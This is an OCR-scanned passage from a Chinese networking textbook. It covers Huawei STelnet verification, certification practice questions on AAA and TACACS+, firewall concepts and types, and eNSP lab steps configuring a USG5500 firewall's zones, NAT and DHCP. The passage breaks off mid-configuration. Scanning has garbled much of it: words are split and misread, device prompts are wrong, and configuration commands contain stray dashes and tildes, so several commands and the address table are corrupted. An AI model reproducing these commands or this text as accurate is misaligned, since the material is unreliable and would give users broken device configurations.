(2) 在 路 由 器 AR2 上 验证 AR1 上 的 STelnet 配置 ,命令 如 下 。 





< RR2 > system— View 

[AR2]ssh client first- time enable // 开 启 SSH 的 客户 端 服务 
[AR2]stelnet 10.1.1.1 

Please input the username:admin 

The server is not authenticated. continue to access it? (y/n)[n]:y 


// 服 务 器 还 没有 验证 ,是 否 继续 访问 ,输入 Y 


Save the server’s public key? (y/n)[n]:y // 询 问 是 否 保 存 公 钥 ,选择 y 
Enter password: huawei // 输 入 密码 huawei 

< RAR1 > system view 

[AR1]quit // 退 出 AR1, 重新 从 AR2 远程 登录 


[AR2]stelnet 10.1.1.1 
Please input the username:admin 


Enter password: huawei 
< RR1 > display ssh server session // 可 以 查看 到 有 连接 信息 


17.5 常见 问题 解答 


开启 SSH 的 客户 端 服务 的 命令 是 什么 ? 


答 : ssh client first-time enable。 








17.6 认证 试题 


选择 题 
1. 下 列 选项 最 有 可 能 用 来 对 访问 思科 路 由 器 CLI 界面 的 网 络 管理 员 进 行 认 
证 的 是 (。 )。 
A. TACACS+ B. Diameter C. RADIUS 


D. ACS 


2. 对 于 一 名 已 经 通过 了 认证 和 授权 的 思科 路 由 器 管理 员 , 下 列 可 以 对 其 尝试 使 用 的 


特定 思科 IOS 命令 执行 准确 的 控制 授权 的 是 (  )。 





A. TACACS+ B. Diameter C. RADIUS D. ISE 
3. ( ”) 两 个 设备 或 用 户 可 以 充当 AAA 服务 器 的 客户 端 。 
A. 路 由 器 B. 交换 机 C. VPN 用 户 D. 管理 员 
4. 在 路 由 器 上 需要 创建 (。“) 并 将 其 应 用 到 VTY 线路 上 ,以 通过 一 系列 特定 的 方 
式 来 识别 用 户 的 身份 。 
A. RADIUS 服务 器 B. TACACS 十 服务 器 
C. 授权 方法 列表 D. 验证 方法 列表 
5. 在 一 个 有 效 的 TACACS 十 服务 组 中 ,最 少 包含 ( 。 “) 台 服务 器 。 
A. 1 B. 2 C.3 D. 4 
6. 通过 下 列 ( 。”) 两 项 可 以 在 路 由 器 上 配置 AAA。 
A. ACS B. CCP C. CLI D. TACACS+ 


7. 下 列 关 于 ACS 5. x 的 叙述 中 ,正确 的 是 ( js 
A. 用 户 组 位 于 网 络 设备 组 中 
B. 授权 策略 可 以 与 访问 特定 网 络 设备 组 的 用 户 组 进行 关联 
C. 用 户 组 中 必须 至 少 拥有 一 个 用 户 
D. 为 了 简便 ,可 以 使 用 用 户 组 来 替代 设备 组 

8. 如 何在 ACS 中 创建 新 的 管理 员 组 ? ( ) 
A. Users and Identify Stores 二 Identity Groups 
B. Identity Stores 二 Identity Groups 
C. Identity Stores and Groups 二 Identity Groups 
D. Users and Groups 二 Identity Groups 

9. 下 列 ( ) 项 有 可 能 导致 AAA 验证 失败 。 
A. AAA 服务 器 上 输入 了 错误 的 密码 
B. 路 由 器 上 配置 的 AAA 服务 器 IP 地 址 有 误 
C. 路 由 有 误 
D. AAA 服务 器 和 路 由 器 之 间 执 行 的 过 滤 有 误 


18.1 用 户 需 求 与 分 析 


防火 墙 是 一 种 非常 有 效 的 网 络 安全 模型 ,通过 它 可 以 隔离 风险 区 域 与 安全 区 域 之 间 
的 连接 ,同时 不 会 妨碍 人 们 对 风险 区 域 的 访问 。 防 火 墙 是 不 同 网 络 间 信 息 的 唯一 出 口 , 根 
据 企 业 网 的 安装 策略 控制 允许 .拒绝 ,监测 出 人 网 络 的 信息 流 ,提供 安全 防范 保护 功能 。 
通过 防火 墙 的 配置 与 应 用 可 以 达到 以 下 目的 : 可 以 限制 外 部 用 户 进入 内 部 网 络 , 过 滤 
不 安全 服务 和 非法 用 户 ; @ 防 止 人 侵 者 接近 防御 设施 ; 四 限制 用 户 访问 特殊 站 点 ; @ 为 
监视 互联 网 安全 提供 方便 。 


18.2 预备 知识 


但 21 防火 墙 的 功能 


传统 意义 的 防火 墙 用 于 控制 实际 的 火灾 ,使 火灾 被 限制 在 建筑 物 的 某 部 分 ,不 会 蓝 延 
到 其 他 区 域 。 而 网 络 安全 中 的 防火 墙 位 于 两 个 信任 程度 不 同 的 网 络 之 间 ( 如 企业 内 部 网 
络 和 Internet 之 间 ) 或 主机 与 网 络 之 间 , 对 两 个 网 络 之 间或 主机 与 网 络 之 间 的 通信 进行 控 
制 ,通过 强制 实施 统一 的 安全 策略 ,防止 对 重要 信息 资源 的 非法 存 取 和 访问 ,以 达到 系统 
安全 的 目的 。 防 火 墙 包括 硬件 .软件 和 控制 策略 ,是 将 内 部 网 和 公共 网 分 隔 的 特殊 网 络 互 
联 设备 或 系统 。 防 火 墙 的 内 部 区 域 是 指 内 部 网 络 或 者 内 部 网 络 的 一 部 分 ,是 可 信任 的 区 
域 ,应 受到 防火 墙 的 保护 。 外 部 区 域 是 指 Internet 或 者 内 部 的 网 络 ,是 不 被 信任 的 区 域 。 
能 够 完成 网 络 用 户 访问 控制 ,验证 服务 .数据 过 滤 , 限 制 内 部 用 户 访问 某 些 站 点 等 功能 。 
它 遵循 允许 或 拒绝 业务 往来 的 网 络 通信 安全 机 制 ,提供 可 控 的 过 滤 网 络 通信 ,只 允许 授权 
的 通信 。 防 火 墙 是 作为 一 个 安全 网 络 的 边界 点 ,在 不 同 的 网 络 区 域 之 间 进 行 流 量 的 访问 
控制 。 

网 络 防火 墙 的 工作 任务 是 设置 一 个 检查 站 ,监视 ,过滤 和 检查 所 有 流 经 的 协议 数据 ， 
并 对 其 执行 相应 的 安全 策略 ,如 阻止 协议 数据 通过 或 禁止 非法 访问 ,能 有 效 地 过 滤 攻 击 流 
量 。 另 外 ,防火 墙 通过 对 网 络 的 访问 行为 进行 记录 , 即 进行 日 志 记录 ,同时 也 提供 审计 功 
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能 ,完成 对 网 络 使 用 情况 的 数据 ,统计 与 监视 功能 。 防 火 墙 通过 NAT 等 技术 完成 对 内 部 
网 络 信息 ,如 关键 主机 的 IP 及 开启 的 服务 等 信息 的 隐藏 与 保护 ,使 内 部 网 络 不 暴露 于 外 
网 。 提 供 企 业 网 络 服务 的 防火 墙 能 控制 和 管理 网 络 访问 ,保护 网 络 和 系统 资源 ,对 数据 流 
量 进 行 深度 检测 ,还 可 以 身份 验证 ,记录 和 报告 事件 。 防 火 墙 通过 设置 DMZ 端口 ,发 布 
企业 的 部 分 资源 与 信息 服务 ,如 对 外 提供 的 Web、FTP 或 E-mail 等 服务 。DMZ 称 为 非 
军事 化 区 ,对 于 防火 墙 的 DMZ 端口 所 连接 的 部 分 ,一 般 称 为 服务 器 群 或 服务 器 区 ,防火 
墙 也 可 以 进行 测量 的 检查 与 控制 ,只 允许 对 特定 的 服务 端口 的 访问 进入 。 如 开放 的 Web 
服务 仅 对 内 部 服务 访问 的 目的 端口 为 80 时 才 人 允许 。 


但 22 防火 墙 的 工作 原理 


防火 墙 是 网 络 上 的 一 种 过 滤器 ,让 安全 的 信息 流通 过 ,将 不 安全 的 信息 全 部 过 滤 掉 。 
防火 墙 采用 的 技术 和 标准 五 花 八 门 ,多 种 多 样 ,但 工作 方式 都 一 样 , 即 分 析出 入 防火 墙 的 
数据 包 , 决 定 放 行 还 是 阻止 通过 。 所 有 的 防火 墙 都 具有 IP 地 址 数据 包 过 滤 功能 ,只 需要 
检查 IP 数据 包头 部 特征 信息 ,如 根据 其 IP 源 地 址 和 目标 地 址 , 即 可 做 出 放行 还 是 丢弃 的 
动作 。 包 过 滤 是 在 IP 层 实现 的 ,根据 包 的 源 IP 地 址 .目的 IP 地 址 、 源 端口 .目的 端口 及 
包 传 递 方向 等 报头 信息 来 判断 是 否 允 许 包 通过 。 包 过 滤 防 火 墙 的 应 用 非常 广泛 ,因为 
CPU 用 来 处 理 包 过 滤 的 时 间 儿 乎 可 以 忽略 不 计 ,并 且 这 种 防护 措施 对 用 户 透明 ,合法 用 
户 在 进出 网 络 时 ,根本 感受 不 到 它 的 存在 ,使 用 起 来 很 方便 。 因 此 这 样 的 系统 具有 很 好 的 
传输 性 能 ,并 容易 扩展 。 但 缺点 是 这 种 防火 墙 不 太 安全 , 包 过 滤 防 火 墙 对 应 用 层 性 能 系 无 
法 解析 ,如 果 攻 击 者 把 自己 主机 的 IP 地 址 设置 成 一 个 合法 主机 的 IP 地 址 ,就 可 以 轻易 通 
过 包 过 滤器 防火 墙 。 代 理 服务 型 防火 墙 在 应 用 层 上 实现 防火 墙 功能 ,弥补 了 包 过 滤 防 火 
墙 的 不 足 。 它 能 提供 部 分 与 传输 有 关 的 状态 ,提供 与 应 用 有 关 的 状态 ,解析 部 分 传输 的 信 
息 ,此 外 还 能 处 理 和 管理 信息 。 

在 技术 实现 上 ,防火 墙 经 历 了 第 一 代 的 包 过 滤 技 术 阶 段 , 最 典型 的 是 设计 在 路 由 器 上 
的 访问 控制 列表 功能 来 完成 包 过 滤 防 火 墙 的 功能 实现 ; 1989 年 推出 的 电路 层 防 火 墙 和 
应 用 层 防 火 墙 被 认为 是 第 二 代 和 第 三 代 防 火 墙 的 初步 结构 ; 1992 年 开发 出 的 基于 动态 
包 过 滤 技 术 被 称 为 第 四 代 防 火 墙 ; 1998 年 NAI 公司 推出 的 自 适应 代理 技术 可 以 称 为 第 
五 代 防火 墙 。 

较 早 的 防火 墙 是 在 路 由 器 上 实现 的 , 随 着 互联 网 应 用 的 普及 ,出 现 了 建立 在 通用 操作 
系统 上 的 防火 墙 ,目前 已 经 发 展 为 具有 安全 的 专用 操作 系统 的 防火 墙 ,并 多 以 独立 的 硬件 
设备 形式 在 网 络 中 部 署 , 但 其 仍然 是 软件 和 硬件 的 结合 ,只 是 较 多 的 功能 是 通过 硬件 实现 
的 ,如 在 对 数据 进行 VPN 传输 的 保护 中 ,性 能 较 好 的 防火 墙 采用 的 是 专用 的 硬件 来 完成 
加 密 处 理 的 ,如 DES 加 密 等 。 


但 23 防火 墙 的 分 类 


市 场 上 防火 墙 产 品种 类 非常 繁多 .划分 的 标准 也 各 式 各 样 。 主 要 的 分 类 有 以 下 几 种 。 
按 操作 对 象 不 同 分 为 主机 防火 墙 和 网 络 防火 墙 。 主 机 防火 墙 的 优点 是 位 置 优 势 、 低 
成 本 ; 缺点 是 难以 部 署 和 维护 、 缺 乏 透 明度 功能 局 限 性 。 例 如 ,天 网 防火 墙 、 诺 顿 防火 墙 
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都 属于 主机 防火 墙 。 网 络 防火 墙 的 优点 是 功能 强大 ,性 能 高 .透明度 强 ; 缺点 是 成 本 高 、 
内 部 攻击 保护 性 差 。 例 如 , 锐 捷 防火 墙 蓝 盾 防火 墙 天 融 信 网络 卫士 都 属于 网 络 防 火 墙 。 

按 实现 方式 不 同 分 为 软件 防火 墙 和 硬件 防火 墙 。 软件 防 火 墙 用 于 应 用 层 控 制 和 检 
测 , 优 点 是 功能 丰富 ; 缺点 是 性 能 低 、 有 自身 安全 性 问题 。 例 如 ,微软 的 ISA 防火 墙 、 
CheckPoint 防火 墙 都 属于 软件 防火 墙 。 硬 件 防 火 墙 的 优点 是 性 能 高 .自身 安全 性 高 、 易 
于 维护 ; 缺点 是 缺乏 高 级 功能 。 例 如 , 锐 捷 防火 墙 `. 思 科 防 护 墙 . 蓝 盾 防 火 墙 和 天 融 信 网 
络 卫士 都 属于 硬件 防火 墙 。 

按 技术 实现 层次 上 分 为 网 络 层 防火 墙 和 应 用 层 防 火 墙 。 网 络 层 防火 墙 通过 对 流 经 的 
协议 数据 包 的 头 部 信息 ,如 源 地 址 、 目 的 地 址 ,协议 号 、 源 端口 和 目的 端口 等 信息 进行 规定 
策略 的 控制 。 而 应 用 层 防 火 墙 可 以 对 协议 数据 流 进行 全 面 的 检查 与 分 析 , 以 确定 其 需 执 
行 策略 的 控制 。 

按 过 滤 和 检测 方式 分 为 包 过 滤 防 火 墙 \ 代 理 型 防火 墙 (又 称 为 应 用 网 关 防 火 墙 )、 状 态 
防火 墙 。 包 过 滤 防 火 墙 利用 定义 的 特定 规则 过 滤 数 据 包 。 规 则 定义 按照 IP 数据 包 的 特 
点 进行 ,可 以 充分 利用 数据 包 中 的 五 元 组 ( 源 IP 地 址 .目标 IP 地 址 、 源 端口 号 .目标 端口 
号 和 协议 号 ) 来 定义 数据 包 通 过 防火 墙 的 条 件 。 包 过 滤 防 火 墙 的 特点 是 简单 ,但 缺乏 灵活 
性 ,由 于 需要 对 每 个 数据 包 都 进行 策略 检查 ,策略 过 多 时 会 导致 网 络 性 能 急剧 下 降 。 代 理 
型 防火 墙 是 把 防火 墙 作 为 一 个 业务 访问 的 中 间 节 点 ,对 Client 来 说 防火 墙 是 一 个 Server， 
对 Server 来 说 防火 墙 是 一 个 Client。 代 理 防火 墙 安 全 性 很 高 ,但 是 开发 代价 很 大 。 对 每 
一 种 应 用 开发 一 个 对 应 的 代理 服务 很 难 做 到 ,因此 代理 型 防火 墙 不 能 支持 很 丰富 的 服务 ， 
只 能 针对 某 些 应 用 提供 代理 支持 ,例如 常用 的 HTTP 代理 。 状 态 防火 墙 通 过 检测 基于 
TCP/UDP 连接 的 连接 状态 ,动态 地 决定 报 文 是 否 可 以 通过 防火 墙 。 在 状态 防火 墙 中 ,会 
维护 着 一 个 以 五 元 组 为 Key 值 的 Session( 会 话 ) 表 项 ,对 于 后 续 数据 包 通 过 匹配 Session 
表 项 防火 墙 就 可 以 决定 哪些 是 合法 访问 ,哪些 是 非法 访问 。 状 态 防火 墙 结合 了 包 过 滤 防 
火 墙 和 代理 防火 墙 的 优点 ,不 仅 速度 快 而 且 安 全 性 高 。 目 前 市 场 上 大 部 分 防火 墙 都 是 采 
用 状态 检测 技术 的 产品 ,华为 的 Eudemon 防火 墙 和 AR G3 防火 墙 均 采用 状态 检测 技术 ， 
而 华为 交换 机 的 防火 墙 则 是 采用 包 过 滤 技术 。 

按 部 署 位 置 不 同 分 为 边界 防火 墙 个 人 防火 墙 和 混合 防火 墙 。 

按 性 能 不 同 分 为 百 兆 级 防火 墙 和 千 兆 级 防火 墙 。 


但 24 防火 墙 的 选用 


目前 ,在 国内 防火 墙 产 品 市 场 中 ,国内 产品 和 国外 产品 各 占 半壁 江山 。 国 外 品牌 的 优 
势 主 要 是 技术 和 知名 度 比 国内 产品 高 。 国 内 品牌 则 对 国内 用 户 需 求 了 解 更 加 透彻 ,价格 
上 也 具有 优势 。 国 外 防火 墙 厂商 主要 有 思科 (CiscoASA)、CheckPoint、NetScreen 等 ,其 
特点 是 自身 开发 能 力 强 ,产品 线 比 较 齐 全 ,有 比较 完善 的 销售 渠道 和 技术 支持 体系 。 它 们 
的 主要 客户 是 电信 、 金 融 等 高 端 用 户 群 。 国 内 防火 墙 一线 厂 商 主 要 有 东软 .天 融 信 、 启 明 
星 展 联想、 方正 \ 安 氏 领 信 、 华 为 等 ,它们 的 产品 应 用 领域 较 广 ,从 高 端 到 低 端 都 有 和 获 盖 ， 
网 络 应 用 从 百 兆 位 到 千 兆 位 ,产品 针对 性 较 强 。 

防火 墙 的 主要 性 能 指标 如 下 。 
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(1) 吞吐 量 : 在 不 丢 包 情况 下 能 够 达到 的 最 大 速率 。 

(2) 时 延 : 入 口 处 输入 帧 最 后 一 个 比特 到 达 出 口 处 输出 帧 第 一 个 比特 输出 所 用 的 时 
间 间 隔 , 体 现 了 防火 墙 处 理 数据 的 速度 。 

(3) 丢 包 率 : 在 连续 负载 情况 下 ,应 转发 却 未 转发 帧 的 百分比 。 对 防火 墙 稳定 性 和 
可 靠 性 有 较 大 影响 。 

(4) 并 发 连接 数 : 穿越 防火 墙 的 主机 之 间或 主机 与 防火 墙 之 间 能 同时 建立 的 最 大 连 
接 数 反 映 了 防火 墙 对 来 自 客户 端 TCP 连接 请 求 的 响应 能 力 。 

(5) 最 大 并 发 连接 数 建立 速率 : 单位 时 间 内 建立 的 最 大 连接 数 ,体现 了 防火 墙 单 位 
时 间 内 建立 和 维持 TCP 连接 的 能 力 。 

目前 市 场 有 六 种 基本 类 型 防火 墙 , 分 别 是 嵌入 式 防 火 墙 ,基于 企业 软件 的 防火 墙 、. 基 
于 企业 硬件 的 防火 墙 \.SOHO 软件 防火 墙 \.SOHO 硬件 防火 墙 和 特殊 防火 墙 。 在 防火 墙 
产品 选 购 中 用 户 通常 考虑 的 要 点 如 表 18-1 所 示 。 


表 18-1 防火 墙 产品 选 购 要 点 








自身 的 安全 性 主要 体现 在 自身 设计 和 管理 两 个 方面 

通过 权威 评测 机 构 测试 ,实际 调查 ,自己 试用 .厂商 的 研制 历史 .厂商 
人 实力 等 方法 判断 
是 否 高 效 一 般 防 火 墙 加 载 上 百 条 规则 ,性 能 下 降 不 应 超过 5% 





提高 可 靠 性 的 措施 一 般 是 提高 本 身 部 件 的 强健 性 、 增 大 设计 阔 值 和 增 











村 加 元 余部 件 , 这 要 求 有 较 高 的 生产 标准 和 设计 元 余 度 

功能 是 否 灵活 要 求 有 一 系列 不 同 级 别 ,满足 不 同 用 户 的 各 类 安全 控制 需求 的 控制 
策略 

配置 是 否 方便 支持 透明 通信 ,在 安装 时 不 需要 对 原 网 络 配 置 做 任何 改动 

管理 是 否 简便 在 充分 考虑 安全 需要 的 前 提 下 ,必须 提供 安全 灵活 的 管理 方式 和 方 


法 ,体现 为 管理 途径 ,管理 工具 和 管理 权限 
是 否 可 以 抵御 拒绝 服务 攻击 | 需 详 细 考察 这 一 功能 的 真实 性 和 有 效 性 
是 否 可 以 针对 用 户 身份 过 滤 | 常用 一 次 性 口令 验证 机 制 ,来 确认 登录 用 户 身份 


如 果 不 支持 软件 升级 ,用 户 需 要 更 换 硬件 ,更 换 期 间 网 络 不 设防 ,同时 
花费 也 较 大 











是 否 可 扩展 、 可 升级 








刀 25 防火 墙 的 局 限 性 


防火 墙 不 是 解决 所 有 网 络 安全 问题 的 万 能 药方 ,只 是 网 络 安全 策略 的 一 个 组 成 部 分 。 
它 的 局 限 性 主要 包括 : 防 外 不 防 内 ; 不 能 防范 全 部 的 威胁 ,特别 是 新 产生 的 威胁 ; 在 提供 
深度 检测 功能 以 及 防火 墙 处 理 转 发 性 能 上 需要 平衡 ; 当 使 用 端 到 端 加 密 时 , 即 有 加 密 隧 
道 穿 越 防火 墙 的 时 候 不 能 处 理 ; 防火 墙 本 身 可 能 会 存在 性 能 瓶颈 ,如 抗 攻击 能 力 、 会 话 数 
限制 等 。 
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18.3 方案 设计 





方案 设计 如 表 18-2 所 示 。 
表 18-2 方案 设计 





任务 名 称 | 防火 墙 的 配置 与 应 用 

1. 利用 eNSP 模拟 实现 防火 墙 的 典型 安装 与 部 署 
(1) 防火 墙 的 连接 与 登录 配置 

(2) 防火 墙 的 典型 安装 与 部 署 

(3) 防火 墙 的 包 过 滤 规 则 设置 

(4) 防火 墙 的 网 络 地 址 转换 设置 

2. 利用 eNSP 模拟 实现 防火 墙 的 策略 管理 

(1) 防火 墙 的 DHCP 服务 配置 

(2) 防火 墙 的 安全 区 域 与 非 安全 区 域 设 置 

(3) 设置 防火 墙 端口 映射 实现 访问 的 互通 

(4) 为 LAN 内 PC 设置 对 外 访问 策略 实现 访问 的 互通 
. 掌握 防火 墙 的 基本 连 线 方法 

. 能 使 用 管理 端口 登录 到 防火 墙 上 进行 配置 

.能 实现 防火 墙 透明 模式 的 典型 安装 和 配置 

. 能 实现 防火 墙 NAT 模式 的 典型 安装 和 配置 

. 能 设置 防火 墙 端口 映射 实现 外 网 访问 内 网 服务 器 
. 能 设置 防火 墙 策略 实现 局 域 网 内 计算 机 访问 外 网 
. 掌握 防火 墙 的 功能 

.了解 防火 墙 的 工作 原理 

.熟悉 防火 墙 的 分 类 

. 掌握 网 络 安全 行业 的 基本 情况 

. 树立 较 强 的 安全 意识 

.培养 吃苦 耐劳 ,实事求是 一丝不苟 的 工作 态度 
. 培养 分 析 能 力 和 应 变 能 力 

. 具有 可 持续 发 展 能 力 





任务 分 解 





能 力 目标 





知识 目标 





素质 目标 





om-loam we 上 





18.4 项 目 实施 
局 41 任务 1: 利用 eNSP 模 拟 实现 防火 墙 的 典型 安装 与 部 署 


1. 任务 目标 


了 解 防火 墙 基本 原理 ,理解 防火 墙 工 作 模式 ,掌握 防火 墙 配置 过 程 ,掌握 eNSP 的 使 
用 方法 。 



































2. 案例 导入 


某 IT 公司 因 业 务 需要 ,在 另外 一 个 城市 建立 了 子 公司 ,现在 要 求 子 公 司 研发 小 组 能 
够 通过 Internet 把 子 公司 关键 业务 机 密 数 据 安 全 地 传 给 总 公司 。 要 求 子 公司 可 以 访问 总 
公司 的 Web 服务 器 .FTP 服务 器 、Telnet 服务器。 总 公司 通过 防火 墙 连接 Internet, 子 公 
司 通过 路 由 器 连接 到 Internet。 


3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 主机 上 预 装 eNSP 软件 。 


4. 任务 分 析 


利用 eNSP 软件 模拟 防火 墙 的 NAT 功能 ,选择 防火 墙 USG5500 1 台 作 为 公司 连接 
Internet 的 接 和 人 设备 (FEW1) ,实现 内 网 地 址 转 为 外 网 地 址 (NAT); 路 由 器 AR2220 1 台 
ARI1 模拟 Internet, 内 网 中 的 2 台 PC 通过 交换 机 LSW1 连接 到 防火 墙 端口 上 。 本 任务 
的 网 络 拓扑 图 如 图 18-1 所 示 。 


< ) EO/ 
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192.168.1254/24 1.1.1.2/24 loopback:100.1.1.1/24 


图 18-1 任务 1 防火 墙 配置 拓扑 图 


5. 实施 过 程 
(1) 在 路 由 器 AR1 上 配置 IP 地 址 ,具体 配置 如 下 。 


< Huawei > system — view // 进 入 系统 视图 界面 
[Huawei]sysname RR1 // 修 改 设备 名 称 为 AR1 
[AR1 ]interface loopback 0 // 进 入 端口 

[AR1 - loopback0]ip address 100.1.1.1 24 // 配 置 IP 地 址 与 子 网 掩 码 
[AR1 - loopback0 ]quit // 退 出 端口 
[AR1 ] interface gigabitethernet 0/0/0 // 进 入 端口 6 0/0/0 

[AR1 - GigabitEthernet0/0/0]ip address 1.1.1.1 24 // 配 置 IP 地 址 与 子 网 掩 码 
[RAR1 - GigabitEthernet0/0/0]quit // 退 出 端口 

(2) 在 防火 墙 FW1 上 配置 各 接口 IP 地 址 和 安全 区 域 ,具体 配置 如 下 。 

< SRG> system - view // 进 入 系统 视图 界面 


[SRG]sysname FW1 // 修 改 设备 名 称 为 FW1 
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[FW1 ]interface gigabitethernet 0/0/0 // 进 入 端口 6 0/0/0 

[FW1 — GigabitEthernet0/0/0]ip address 1.1.1.2 24 // 配 置 IP 地 址 与 子 网 掩 码 
[FW1 - GigabitEthernet0/0/0]quit // 退 出 端口 

[FEW1]interface gigabitethernet 0/0/1 // 进 入 端口 6 0/0/1 

[FW1 - GigabitEthernet0/0/1]ip address 192.168.1.254 24 // 配 置 IP 地 址 与 子 网 掩 码 
[FW1 - GigabitEthernet0/0/1]quit // 退 出 端口 

[FW1 ]firewall zone untrust // 进 入 untrust 安全 区 域 视图 
[FW1 - zone - untrust]add interface gigabitethernet 0/0/0 // 将 端口 加 入 untrust 区 域 
[FW1 - zone — untrust]quit // 退 出 

[FW1 ]firewall zone trust // 进 入 trust 安全 区 域 视图 
[FW1 - zone trust]add interface gigabitethernet 0/0/1 // 将 端口 加 入 trust 区 域 
[FW1 - zone— trust]quit // 退 出 


(3) 配置 防火 墙 FW1 的 包 过 滤 规 则 ,具体 配置 如 下 。 


[FW1 ]policy interzone trust untrust outbound // 配 置 trust 到 untrust 的 outbound 规则 

[FW1 - policy- interzone — trust ~ untrust ~ outbound]policy 0 

[FW1 - policy ~ interzone — trust ~ untrust ~ outbound ~ 0]action permit 

[FW1 - policy- interzone — trust ~ untrust ~- outbound — 0]policy source 192.168.1.0 mask 24 

[FW1 - policy ~ interzone ~ trust ~ untrust ~- outbound ~ 0]quit 

[FW1 - policy ~ interzone ~ trust ~ untrust - outbound]quit 

[FW1]ip route-static 0.0.0.0 0.0.0.0 1.1.1.1 // 添 加 默认 路 由 ,实现 局 域 网 用 户 访问 
//Internet 的 路 由 可 达 


(4) 配置 防火 墙 PFW1 的 NAT, 使 局 域 网 用 户 能 够 访问 Internet, 具 体 配 置 如 下 。 


[FW1 ]nat - policy interzone trust untrust outbound // 配 置 trust 到 untrust 的 NAT outbound 
// 规 则 

[FW1 - nat ~ policy ~ interzone— trust ~- untrust ~ outbound]policy 1 

[FW1 - nat ~ policy- interzone- trust ~ untrust ~ outbound ~ 1]action source - nat 

[FW1 - nat ~ policy- interzone- trust ~ untrust ~- outbound— 1]policy source 192.168.1.0 

mask 24 

[FW1 - nat - policy — interzone - trust - untrust - outbound - 1]easy — ip gigabitethernet 0/0/0 
//NAT 转换 成 该 端口 IP 地 址 

[FW1 - nat — policy- interzone— trust ~ untrust ~ outbound— 1]quit 

[FW1 - nat ~ policy ~ interzone ~ trust ~ untrust ~ outbound]quit 


(5) 配置 PC1 和 PC2 的 IP 地 址 、 子 网 掩 码 和 网 关 , 地 址 信息 如 表 18-3 所 示 。 
表 18-3 主机 和 网 络 设备 IP 地 址 信息 表 
设备 名 称 FCl PC2 FW1 的 G0/0/0|FW1 的 G0/0/1|ARIl 的 G0/0/0 








IP 地 址 192.168.1.1 192. 168. 1. 2 了 192. 168. 1. 254 | 1. 1. 1. 1 
子 网 掩 码 | 255. 255. 255.0 | 255. 255. 255. 0 | 255. 255. 255. 0 | 255. 255. 255. 0 | 255. 255. 255. 0 








网 关 192. 168. 1. 254 | 192. 168. 1. 254 Ss 一 — 
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(6) 结果 验证 。 单 击 PC1 的 “命令 行 "标签 ,在 命令 提示 符 下 输入 ping 100. 1. 1. 1 即 
可 测试 连接 是 否 正常 。 


旭 42 任务 2: 利用 ehNSP 模 拟 实现 防火 墙 的 策略 管理 
1. 任务 目标 


了 解 防 火 墙 基本 原理 ,理解 防火 墙 工作 模式 ,掌握 防火 墙 配置 过 程 , 掌 握 eNSP 的 使 
用 方法 。 


2. 案例 导入 


某 IT 公司 因 业 务 需要 ,在 另外 一 个 城市 建立 了 子 公司 ,现在 要 求 子 公司 研发 小 组 能 
够 通过 Internet 把 子 公司 关键 业务 机 密 数据 安全 地 传 给 总 公司 。 要 求 子 公司 可 以 访问 总 
公司 的 Web 服务 器 .FTP 服务 器 、Telnet 服务 器 。 总 公司 通过 防火 墙 连 接 Internet, 子 公 
司 通过 路 由 器 连接 到 Internet。 


3. 工作 环境 


(1) Windows 7 系统 的 主机 。 
(2) 主机 上 预 装 eNSP 软件 。 


4. 任务 分 析 


利用 eNSP 软件 模拟 防火 墙 的 部 署 与 配置 ,选择 防火 墙 USG5500 1 台 , 作 为 总 公司 
连接 Internet 的 接 入 设备 (FW1); 路 由 器 AR2220 5 台 ,分 别 是 AR1、AR2、AR3、AR4 和 
AR5, 其 中 AR1 模拟 Telnet 服务 器 ,AR2 模拟 Internet,AR3 模拟 子 公司 连接 Internt 的 
接 入 设备 ,AR4 模拟 子 公司 的 Telnet 客户 端 ,AR5 模拟 Internet 上 的 Telnet 客户 端 ; 服 
务 器 2 台 , 分 别 为 Clientl 和 Client2, 其 中 Clientl 作为 Web 服务 器 ,Client2 作为 FTP 服 
务 器 ; PC 模拟 器 3 台 , 分 别 是 Client3、Client4 和 Client5 ,其 中 Client3 作为 总 公司 内 网 
普通 PC,Client4 作为 子 公 司 PC 客户 端 访问 Web 服务 器 和 FTP 服务 器 ,Client5 作为 外 
网 PC 客户 端 测试 服务 器 ; 交换 机 S3700 3 台 , 分 别 为 LSW1、LSW2 和 LSW3, 其 中 
LSW1 为 总 公司 内 部 组 网 设备 ,LSW2 为 子 公 司 组 网 设备 ,LSW3 为 外 网 设备 。 网 络 拓扑 
图 和 端口 设备 互联 情况 如 图 18-2 所 示 。 

为 了 达到 接近 现实 环境 的 效果 ,需要 规划 以 下 IP 地 址 。 将 总 公司 与 子 公司 各 自 内 部 
主机 地 址 都 设置 为 私有 IP, 总 公司 为 192. 168. 1. 0/24, 子 公司 为 192. 168. 2. 0/24。 将 总 
公司 与 Internet 连接 部 分 的 网 段 设 为 202. 101. 12.0/24, 子 公司 与 外 网 Internet 相连 部 分 
的 网 段 设 为 202.101.10.0/24, 外 网 Internet 的 网 段 为 202. 101. 15.0/24。 


(1) 总 公司 网 络 组 建 。 对 总 公司 防火 墙 .DHCP 客户 端 \Telnet、Web 和 FTP 服务 器 
进行 配置 ,可 以 组 建 一 个 总 公司 小 型 局 域 网 。 主 要 分 为 4 步 : 四 防火 墙 的 DHCP 配置 ; 
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图 18-2 任务 2 防火 墙 配置 拓扑 图 


@DHCP 客户 端的 配置 ; BFTP 和 Web 服务 器 的 配置 ; @Telnet 客户 端的 配置 。 


(2) 配置 防火 墙 FW1 的 DHCP 服务 ,创建 地 址 池 , 并 关联 到 防火 墙 的 内 网 端口 。 双 


击 防火 墙 FW1, 在 弹出 的 窗口 中 配置 FW1, 具 体 配置 如 下 。 


< SRG > undo terminal monitor // 不 显示 警告 信息 

< SRG > system— view // 进 入 系统 视图 界面 
[SRG] sysname FW1 // 修 改 设备 名 称 

[FW1 ]dhcp server ip - pool 188 // 创 建 地 址 池 

[FN1 - dhcp — 188 ]network 192. 168. 1.0 mask 24 // 设 置地 址 池 的 范围 

[FW1 - dhcp- 188]gateway — list 192.168.1.1 /1 设置 客户 端 自动 获取 的 网 关 地 址 
[FW1 - dhcp— 188]quit // 退 出 端口 
[FW1 ] interface gigabitethernet 0/0/0 // 进 入 端口 6 0/0/0 

[FW1 - GigabitEthernet0/0/0]ip address 192.168.1.1 24  ”// 配 置 IP 地 址 与 子 网 掩 码 
[FW1 - GigabitEthernet0/0/0]dhcp select interface // 关 联 端 口 

[FW1 - GigabitEthernet0/0/0]quit // 退 出 端口 


[FW1 ]interface gigabitethernet 0/0/1 


// 进 入 端口 6 0/0/1 


[FW1 - GigabitEthernet0/0/0]ip address 202.101.12.1 24 // 配 置 IP 地 址 与 子 网 掩 码 


[FW1 - GigabitEthernet0/0/0]quit 


